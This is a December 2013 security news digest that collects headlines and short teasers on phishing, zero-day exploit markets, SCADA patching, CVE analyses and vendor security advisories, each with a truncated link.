---------------------------------------------
Scammers are up to mischief again by tricking users into clicking false webmail widgets. The core goal of any phishing attempt is to compromise the victim's access to a particular service. Usually this is done by posing as the service the attacker wants to hijack from the victim, and sending the username and password information back to the attacker. I've seen plenty of phishing schemes in the
---------------------------------------------
http://research.zscaler.com/2013/12/google-docs-scam-stealing-passwords-in.…
*** Study finds zero-day vulnerabilities abound in popular software ***
---------------------------------------------
Organizations selling exploits for vulnerabilities in software from major companies including Microsoft, Apple, Oracle, and Adobe
---------------------------------------------
http://www.csoonline.com/article/744307/study-finds-zero-day-vulnerabilitie…
*** EU cyber security Agency ENISA argues that better protection of SCADA Systems is needed ***
---------------------------------------------
How long can we afford to have critical infrastructures that use unpatched SCADA systems, the EU's cyber security Agency ENISA asks. ENISA argues that the EU Member States could proactively deploy patch management to enhance the security of SCADA systems.
---------------------------------------------
http://www.enisa.europa.eu/media/press-releases/eu-cyber-security-agency-en…
*** Hacking a Reporter: Sleepless Nights Outside a Brooklyn Brownstone (Part 3 of 3) ***
---------------------------------------------
This post is the conclusion of a three-part series that goes into more depth about our experience hacking journalist Adam Penenberg, which resulted in an article on PandoDaily in October. Parts one and two detail the malware aspects of our hack with contributions from Josh Grunzweig, Matt Jakubowski and Daniel Chechik. I, Garret Picchioni (voted to be the bald hacker with a heart tattoo in the original article artwork), will discuss the details of the...
---------------------------------------------
http://blog.spiderlabs.com/2013/12/hacking-a-reporter-sleepless-nights-outs…
*** Weekly Metasploit Update: SAP and Silverlight ***
---------------------------------------------
We've been all SAP all the time here in the Independent Nations of Metasploit, and expect to be for the rest of the week. You might recall that Metasploit exploit dev, Juan Vazquez published his SAP survey paper a little while back; on Tuesday, we did a moderated twitter chat on the hashtag #pwnSAP with the major SAP-focused Metasploit contributors Bruno Morrison, Chris John Riley, and Dave Hartley; and today (Thursday, December 5), Juan and I will be hosting a webcast on the various and sundry SAP exposures that Metasploit covers, and There Will Be Demos and Q&A, so it should be fun.
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2013/12/05/weekly-me…
*** CVE-2013-3346/5065 Technical Analysis ***
---------------------------------------------
In our last post, we warned of a new Windows local privilege escalation vulnerability being used in the wild. We noted that the Windows bug (CVE-2013-5065) was exploited in conjunction with a patched Adobe Reader bug (CVE-2013-3346) to evade the...
---------------------------------------------
http://www.fireeye.com/blog/technical/cyber-exploits/2013/12/cve-2013-33465…
*** Security Bulletin: Multiple Security Vulnerabilities in IBM Sterling Control Center ***
---------------------------------------------
A number of security vulnerabilities have been discovered in the Java Runtime Environment and the Cognos Business Intelligence components included in IBM SCC. CVE(s): CVE-2013-1557, CVE-2013-1478, CVE-2013-1571, CVE-2013-1500, CVE-2013-2988, CVE-2013-2978 and CVE-2013-0586. Affected product(s) and affected version(s): IBM InfoSphere Information Server Versions 8.0, 8.1, 8.5, 8.7, and 9.1 running on all platforms. Refer to the following reference URLs for remediation and additional vulnerability...
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_mul…
*** Security Bulletin: Multiple security vulnerabilities exist in IBM InfoSphere Information Server (CVE-2013-4066 and CVE-2013-4067) ***
---------------------------------------------
Multiple security vulnerabilities exist in the IBM JRE that is shipped with the Rational Reporting for Development Intelligence (RRDI). The same security vulnerabilities also exist in the IBM Java SDK that is shipped with the IBM WebSphere Application Server (WAS). CVE(s): CVE-2013-4066 and CVE-2013-4067. Affected product(s) and affected version(s): IBM InfoSphere Information Server Versions 8.0, 8.1, 8.5, 8.7, and 9.1 running on all platforms. Refer to the following reference URLs for...
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_mul…
*** Sonicwall GMS 7.x Filter Bypass ***
---------------------------------------------
Topic: Sonicwall GMS 7.x Filter Bypass
Risk: Low
Text: Document Title: Sonicwall GMS v7.x - Filter Bypass & Persistent Vulnerability
References (Source): == http...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013120048
*** VMware ESX Server Service Console Two Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/55917
*** SSA-568732 (Last Update 2013-12-06): Privilege Escalation in COMOS ***
---------------------------------------------
https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit…
*** WordPress JS Hotel Plugin "roomid" Cross-Site Scripting Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/55919
*** NVIDIA Graphics Drivers GPU Access Privilege Escalation Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/55904
*** HP-UX update for Java ***
---------------------------------------------
https://secunia.com/advisories/55978
*** IBM Forms Viewer XFDL buffer overflow ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/87911